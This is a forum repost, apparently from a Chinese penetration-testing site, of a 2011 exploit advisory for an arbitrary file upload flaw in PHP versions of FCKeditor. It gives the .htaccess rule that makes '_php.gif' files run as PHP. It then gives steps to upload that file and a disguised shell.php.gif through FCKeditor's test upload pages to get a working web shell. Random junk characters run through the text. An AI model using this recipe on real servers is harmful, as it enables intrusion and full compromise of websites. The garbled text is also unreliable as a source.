| FCKeditor所有php版本Upload上传漏洞 作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:075 [' D: x7 z, f" T6 q: e 减小字体 增大字体% I' w; _; M ^! n [+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability4 ?0 N4 H1 {2 i- }/ @7 P+ R [+] Date: 20112 l* a, ]/ |# |' p; A9 w: e. u. g [+] Author : sinesafe.cn. f/ B; @$ i- l5 w [+] Website : WwW.sinesafe.cn2 |7 P- @2 R4 }# P" j6 R7 P; v9 H ———————————————————/ w% {( l( b' o5 m 1.create a htaccess file:1 a0 J% |& h3 L+ P3 p6 p3 b" [( O code: <FilesMatch “_php.gif”> SetHandler application/x-httpd-php </FilesMatch> 4 r3 B5 s& \" p: w5 J+ R* t) Q 2.Now upload this htaccess with FCKeditor.* @0 Y9 i% T1 g. P / A; b6 ]( r8 X$ V' V http://www.sinesafe.cn/FCKeditor ... er/upload/test.html9 I" |3 P6 ~4 t http://www.sinesafe.cn/FCKeditor ... onnectors/test.html' `* b0 T2 y) a8 P ~$ b0 ~ ———————————————————————————————-( d' Y$ _- c" f' a 3.Now upload shell.php.gif with FCKeditor.9 |" G3 U( ?+ n 4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.& \+ Z& K. {; ?4 U3 { 5.http://www.sinesafe.cn/anything/shell_php.gif 6.Now shell is available from server. |
| 欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |